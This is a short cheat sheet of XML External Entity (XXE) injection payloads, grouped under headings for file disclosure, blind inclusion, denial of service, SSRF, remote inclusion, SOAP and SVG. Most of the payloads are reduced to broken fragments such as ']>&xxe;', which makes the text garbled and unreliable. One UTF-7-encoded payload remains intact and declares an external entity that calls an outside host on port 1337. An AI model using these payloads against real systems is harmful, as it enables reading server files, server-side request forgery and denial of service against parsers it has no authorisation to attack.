# XML External Entity (XXE) Injection Payloads
* XXE: Classic XXE
]>
&file;
]>&xxe;
]>&xxe;
]>&xxe;
* XXE: Basic XML Example
John
Doe
* XXE: Entity Example
]>
John
&example;
* XXE: File Disclosure
]>
John
&ent;
* XXE: Denial-of-Service Example
&lol9;
* XXE: Local File Inclusion Example
]>&xxe;
* XXE: Blind Local File Inclusion Example (when the first case doesn't return anything)
]>&blind;
* XXE: Access Control Bypass (Loading Restricted Resources - PHP example)
]>
&ac;
* XXE: SSRF (Server-Side Request Forgery) Example
]>&xxe;
* XXE: (Remote Attack - Through External XML Inclusion) Example
]>
3..2..1...&test
* XXE: UTF-7 Example
+ADwAIQ-DOCTYPE foo+AFs +ADwAIQ-ELEMENT foo ANY +AD4
+ADwAIQ-ENTITY xxe SYSTEM +ACI-http://hack-r.be:1337+ACI +AD4AXQA+
+ADw-foo+AD4AJg-xxe+ADsAPA-/foo+AD4
* XXE: Base64 Encoded
%init; ]>
* XXE: XXE inside SOAP Example
%dtd;]>]]>
* XXE: XXE inside SVG